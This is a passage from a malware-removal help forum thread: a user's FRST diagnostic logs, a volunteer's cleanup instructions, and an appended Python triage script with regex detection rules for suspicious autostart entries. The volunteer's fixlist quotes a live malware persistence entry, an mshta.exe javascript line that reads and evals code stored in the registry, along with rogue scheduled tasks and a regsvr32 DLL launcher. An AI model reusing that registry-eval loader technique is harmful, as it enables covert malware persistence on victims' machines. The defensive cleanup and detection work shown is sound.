MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BaiduYunDetect => "C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\YunDetectService.exe"
MSCONFIG\startupreg: BaiduYunGuanjia => "C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\BaiduNetdisk.exe" AutoRun
MSCONFIG\startupreg: iKu => "C:\Program Files (x86)\YouKu\YoukuClient\YoukuDesktop.exe" iku://|reg|
MSCONFIG\startupreg: Ofics => C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\12nbkm.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Wondershare Helper Compact.exe => "C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelperSetup.exe"
MSCONFIG\startupreg: YoukuMediaCenter => "C:\Users\w7\AppData\Roaming\ytmediacenter\YoukuMediaCenter.exe" iku://|start| --sr=r_hklm
MSCONFIG\startupreg: ZhiboBrowserNT => C:\Program Files (x86)\ZhiBoBrowser\ZhiboBrowserNT.exe
MSCONFIG\startupreg: ZhoboBrowserNotify => C:\Program Files (x86)\ZhiBoBrowser\ZhoboBrowserNotify.exe
MSCONFIG\startupreg: {4C0D3E90-5FCB-88B2-9A48-633FA7CC51E1} => C:\Windows\Temp\12nbkm.exe
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
08-08-2017 08:19:29 Windows Update
08-08-2017 16:23:09 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
08-08-2017 16:23:20 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Microsoft Virtual WiFi Miniport Adapter #2
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/10/2017 01:29:26 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={4BB498BD-27E4-45A7-9341-8F0647F6730B}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:20 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={C90E07B7-0E64-4384-8F2E-8B76CFAFDF04}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:14 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={61E47F00-4FBC-48E8-96DD-927601FBFC94}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:08 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={998C440F-0BC3-4282-9AC2-A5606AB93293}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:02 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={9C2EDE0D-FE29-4844-ADD6-124C9005C49D}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:55 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={CE13A89E-2B8D-4258-A1F9-294DA44CF756}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:49 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={84C9B100-92EA-4237-BBB0-1648E03C6326}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:43 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={0E5C49F6-3247-4ED0-AC9D-8DD43B6CAB83}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:37 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={8782AC9E-C8A2-47D7-8C55-706209EA5400}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:31 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={A2AD2BA6-E15B-495B-A76D-00764E420B5E}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
 
System errors:
=============
Error: (08/10/2017 02:44:36 PM) (Source: NetBT) (EventID: 4311) (User: )
Description: Initialization failed because the driver device could not be created.
Use the string "%2" to identify the interface for which initialization
failed. It represents the MAC address of the failed interface or the 
Globally Unique Interface Identifier (GUID) if NetBT was unable to 
map from GUID to MAC address. If neither the MAC address nor the GUID were 
available, the string represents a cluster device name.
 
Error: (08/10/2017 01:29:25 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={4BB498BD-27E4-45A7-9341-8F0647F6730B}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:19 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={C90E07B7-0E64-4384-8F2E-8B76CFAFDF04}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:13 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={61E47F00-4FBC-48E8-96DD-927601FBFC94}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:07 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={998C440F-0BC3-4282-9AC2-A5606AB93293}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:01 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={9C2EDE0D-FE29-4844-ADD6-124C9005C49D}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:54 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={CE13A89E-2B8D-4258-A1F9-294DA44CF756}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:48 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={84C9B100-92EA-4237-BBB0-1648E03C6326}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:42 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={0E5C49F6-3247-4ED0-AC9D-8DD43B6CAB83}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:36 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={8782AC9E-C8A2-47D7-8C55-706209EA5400}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
 
CodeIntegrity:
===================================
  Date: 2017-08-10 19:10:33.940
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 19:10:29.209
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 14:10:31.615
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 14:10:28.727
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 13:55:16.129
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 13:55:13.280
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 12:14:37.957
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-08-10 12:14:37.917
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-08-10 11:40:49.825
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-08-10 11:40:49.785
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4710MQ CPU @ 2.50GHz
Percentage of memory in use: 46%
Total physical RAM: 16303.74 MB
Available physical RAM: 8717.57 MB
Total Virtual: 19601.92 MB
Available Virtual: 11438.68 MB
 
==================== Drives ================================
 
Drive c: (Velociraptor) (Fixed) (Total:119.14 GB) (Free:23.67 GB) NTFS
Drive d: (Tricerotops) (Fixed) (Total:206.16 GB) (Free:8.25 GB) NTFS
Drive e: (Pteronodon) (Fixed) (Total:303.82 GB) (Free:8.56 GB) NTFS
Drive f: (Megalodon) (Fixed) (Total:421.53 GB) (Free:5.93 GB) NTFS
Drive i: (Dragon Raptor) (Fixed) (Total:931.51 GB) (Free:4.25 GB) NTFS
Drive j: (Velociraptor Crucial) (Fixed) (Total:465.76 GB) (Free:7.05 GB) NTFS
Drive k: (Ankylosaurus) (Fixed) (Total:465.76 GB) (Free:4.17 GB) NTFS
Drive l: (Gigantoraptor) (Fixed) (Total:1863.01 GB) (Free:1040.73 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 119.2 GB) (Disk ID: BC982382)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=119.1 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 8AEF1250)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 5F64FA4F)
Partition 1: (Not Active) - (Size=206.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=303.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=421.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 3 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: E70CA817)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 4 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 6AD0455E)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 5 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 96378119)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#5 pystryker


Posted 10 August 2017 - 06:08 PM

Hello :)

I'm analyzing your logs and preparing a fix. Please run the following tool and post the resulting log. :thumbup2:


Scan with CKScanner


Download CKScanner from here.

Important: Save it to your desktop.

Double-click CKScanner.exe and click Search For Files. (If you have Windows Vista / Windows 7 / Windows 8, please right-click on CKScanner.exe and select Run as Administrator.)

After a very short time, when the cursor hourglass disappears, click Save List To File.

A message box will verify that the file is saved.

Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.

Things I need to see in your next post:

CKFiles.txt

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.





#6 sirjoe1


Posted 11 August 2017 - 12:56 AM

Attached.

Edit: CKScanner 2.5 - Additional Security Risks - These are not necessarily bad

c:\users\w7\appdata\roaming\command & conquer 3 kane's wrath\profiles\dragonemperor\hotkeys.ini
c:\users\w7\appdata\roaming\command & conquer 3 tiberium wars\profiles\dragonjoe\hotkeys.ini
c:\users\w7\appdata\roaming\red alert 3\profiles\dragoviii\hotkeys.ini
c:\users\w7\appdata\roaming\red alert 3 uprising\profiles\dragonemperorjoe\hotkeys.ini
scanner sequence 3.CA.11.JWCPP0
 ----- EOF ----- 
 



Edited by sirjoe1, 11 August 2017 - 12:57 AM.


#7 pystryker


Posted 11 August 2017 - 06:41 AM

Hello :)

Step 1: Fix with FRST

Important: Before performing this step, please move FRST64.exe from C:\Users\w7\Downloads to your Desktop or the fix will not work. All tools must be run from the Desktop.
  • Open Notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this, highlight the contents of the box, right-click on it and select Copy.)
  • Right-click in the open Notepad window and select Paste.
  • Save it on the desktop as fixlist.txt

Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [URPmedia] => C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\pdevhelper.dll
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker => not found
HKU\.DEFAULT\Software\Classes\b586d: "C:\Windows\system32\mshta.exe" "javascript:McWTU4a5i="TwujZb";N2E=new ActiveXObject("WScript.Shell");s6yGd="2GtCLhxi";QPf6U3=N2E.RegRead("HKCU\\software\\sfcc\\bymfflwgby");DNQ9RS="1OTKLf";eval(QPf6U3);M9MhRI7="LLhwqc";" <==== ATTENTION
Task: {74E7CA0C-4B28-4B51-B431-EAFEEC2EB294} - System32\Tasks\mjg2kyft => C:\Program Files\Common Files\0jkxweer\b2137hepploxh.exe
C:\Program Files\Common Files\0jkxweer
Task: {97CE1122-7664-4679-8B4A-3CA552606766} - System32\Tasks\lar3es1h => C:\Program Files\Common Files\4eubx1r5\c15b9htfdo2ym.exe
C:\Program Files\Common Files\4eubx1r5
Task: {C3A4EAAF-8237-4FAA-9680-EDB028564D41} - System32\Tasks\inyraupuat => C:\Windows\system32\config\systemprofile\AppData\Local\Stimtandax [Argument = /t 1632 2932] <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [99]
AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [86]
AlternateDataStreams: C:\ProgramData\TEMP:D5FBE8F9 [336]
AlternateDataStreams: C:\ProgramData\TEMP:DBC416F8 [86]
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll => No File
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @cfca.com/SecEditCtl.BOC,version=1.0.0.9 -> C:\Windows\system32\npSecEditCtl.BOC.x86.dll [No File]
FF Plugin-x32: @tiancity.com/NxGame -> \NGM\npNxGameCN.dll [No File]
S3 Tosrfcom; no ImagePath
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 2: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

Step 3: AdwCleaner

Download AdwCleaner by Xplode to your Desktop from the following link.

Download Link #1
Download Link #2

  • Right-click on AdwCleaner.exe and choose Run as administrator;
  • Click on Option and put a check mark on everything;
  • Click on Scan and let the program run unhindered;
  • When done, click on Clean and allow the system to reboot after it is done;
  • A log will be opened automatically after the restart. If not, it is located in C:\AdwCleaner\AdwCleaner[CX].txt, where X is replaced with a number;
  • Copy and Paste the contents of this log in your reply.

Step 4: Fresh FRST Logs
  • Start Farbar's Recovery Scan Tool and press the Scan button.
  • FRST will scan your system and produce one log this time. Please post it in your next reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool Log

AdwCleaner Log

Fresh FRST.txt Log

Fresh Addition.txt Log






#8 sirjoe1


Posted 11 August 2017 - 08:45 AM

JRT.txt Attached File  JRT.txt   2.83KB   1 downloads



#9 sirjoe1


Posted 11 August 2017 - 08:46 AM

Fixlog Attached File  Fixlog.txt   6.77KB   1 downloads



#10 sirjoe1


Posted 11 August 2017 - 08:55 AM

adwcleanerlog



Edited by sirjoe1, 11 August 2017 - 08:59 AM.


#11 sirjoe1


Posted 11 August 2017 - 09:10 AM

additionAttached File  Addition.txt   65.66KB   3 downloads



#12 sirjoe1


Posted 11 August 2017 - 09:12 AM

frstlog Attached File  FRST.txt   47.64KB   2 downloads



#13 pystryker


Posted 11 August 2017 - 09:25 AM

Hello :)

Please do not attach the logs, but copy and paste them as a reply. It makes them easier to analyze. How is the machine running? Has the pop-up stopped occurring? I will study your logs this evening when I get in from work and post further instructions then. Please let me know if the pop up has stopped.






#14 pystryker


Posted 11 August 2017 - 07:28 PM

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.


Step 1: Scan with Malwarebytes


Start the programme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits
Go back to the Dashboard and select Scan Now
If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.
On completion of the scan (or after the reboot), start MBAM,
Click History, then Application Logs, then check the Select box by the first Scan Log in the list.
Click View, then click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.



Step 2: Scan with ESET Online Scanner

Disable your security programs, which include but are not limited to anti-virus, anti-malware, anti-spyware et cetera. Peruse this for additional information.
  • Download esetsmartinstaller_enu.exe by clicking here.
  • Right-click on the program and choose Run as administrator.
  • Accept their terms and conditions and proceed.
  • Install Add-On/Active X if prompted.
  • From the Computer Scan Setting check the following box --
      • Enable detection for potentially unwanted programs
  • Click on Advanced Setting --
      • Check the box beside Remove Found Threats;
      • Check the box beside Scan archives
      • Check the box beside Scan for potentially unsafe applications
      • Check the box beside Enable Anti-Stealth Technology
  • Click on Start and wait for the virus signature database to update.
  • The online scan will begin automatically and can take several hours.
  • Note: Do not touch either the mouse or keyboard during the scan. Otherwise it may stall.
  • After the scan finishes --
      • If no threats were found:
          • Put a checkmark in Uninstall application on close.
          • Close the program and report that nothing was found
      • If threats were found:
          • Open the file located in C:\Program Files\ESET\ESET Online Scanner\log.txt (32-bit) or C:\Program Files (x86)\ESET\ESET Online Scanner\log.txt (64-bit).
          • Copy and paste contents of the log file in your next reply.
Note: Enable your security programs afterwards.

Step 3: SecurityCheck Scan


Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

Things I need to see in your next post:
  • ESET Scan Log
  • MBAM Log
  • SecurityCheck Log






#15 sirjoe1


Posted 12 August 2017 - 02:54 AM

Thanks a bunch, no more popup on startup. Anti virus and malwarebytes all clean.  :guitar:  :thumbup2: Oh wait.. malwarebytes detected something:

 
Registry Key: 2
PUP.Optional.oTweakRegistryCleaner, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RegistryCleaner.exe, No Action By User, [8380], [398949],1.0.2566
PUP.Optional.oTweakRegistryCleaner, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RegistryCleaner.exe, No Action By User, [8380], [398949],1.0.2566
 
Registry Value: 1
Backdoor.Bot, HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|MICROSOFT UPDATE, No Action By User, [48], [197481],1.0.2566 
 

Edited by sirjoe1, 12 August 2017 - 02:58 AM.
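
An added triage sketch (not part of the thread and not FRST's own logic) that applies four heuristics to autostart lines like the ones quoted above: regsvr32 registering a DLL from a user-writable folder, mshta.exe given an inline script, anything under the SYSTEM account's profile AppData, and executables in C:\Windows\Temp. The rule names, `split_entry` and `triage` are assumptions made for this example; the sample lines are copied from the logs and fixlist in this thread, with the mshta script body shortened and the ATTENTION markers dropped.

```python
import re
from typing import NamedTuple

# Lines copied from the FRST output and fixlist in this thread (mshta script body
# shortened, trailing ATTENTION markers dropped). The last two are ordinary
# Program Files entries from the same log, kept for contrast.
SAMPLE_LOG = r'''
HKLM-x32\...\Run: [URPmedia] => C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\pdevhelper.dll
HKU\.DEFAULT\Software\Classes\b586d: "C:\Windows\system32\mshta.exe" "javascript:/* body shortened */"
MSCONFIG\startupreg: Ofics => C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\12nbkm.exe
MSCONFIG\startupreg: {4C0D3E90-5FCB-88B2-9A48-633FA7CC51E1} => C:\Windows\Temp\12nbkm.exe
Task: {C3A4EAAF-8237-4FAA-9680-EDB028564D41} - System32\Tasks\inyraupuat => C:\Windows\system32\config\systemprofile\AppData\Local\Stimtandax [Argument = /t 1632 2932]
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
'''

# Heuristics, not verdicts: each one names a trait visible in the thread's entries.
# (Hypothetical rule names chosen for this example.)
RULES = [
    # regsvr32 used as a launcher for a DLL that lives in a user-writable folder
    ("regsvr32-user-dll",
     re.compile(r'regsvr32(?:\.exe)?"?\s+.*\\(?:AppData|Temp|ProgramData)\\.*\.dll', re.I)),
    # mshta handed a script on the command line instead of an .hta file
    ("mshta-inline-script",
     re.compile(r'mshta(?:\.exe)?"?\s+"?(?:javascript|vbscript):', re.I)),
    # the SYSTEM account's profile: an unusual home for an autostart target
    ("systemprofile-appdata",
     re.compile(r'\\config\\systemprofile\\AppData\\', re.I)),
    # executable started from the Windows temp directory
    ("autorun-from-windows-temp",
     re.compile(r'\\Windows\\Temp\\[^\\\s]+\.(?:exe|dll|scr)\b', re.I)),
]


class Finding(NamedTuple):
    location: str   # registry key, task or startup slot that holds the entry
    target: str     # command line the entry would run
    rules: tuple    # names of the heuristics that matched


def split_entry(line):
    """Split an FRST-style line into (location, target).

    Most lines use ' => '; class-key lines such as the mshta one use ': '.
    """
    for sep in (" => ", ": "):
        if sep in line:
            location, target = line.split(sep, 1)
            return location.strip(), target.strip()
    return line.strip(), ""


def triage(log_text):
    """Return a Finding for every entry whose target matches at least one rule."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        location, target = split_entry(line)
        hits = tuple(name for name, rx in RULES if rx.search(target))
        if hits:
            findings.append(Finding(location, target, hits))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(", ".join(f.rules), "|", f.location)
```

A hit is a reason to inspect the file and its signature, not a verdict. The MSCONFIG lines are entries that were already disabled, but the files they point to may still be on disk.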




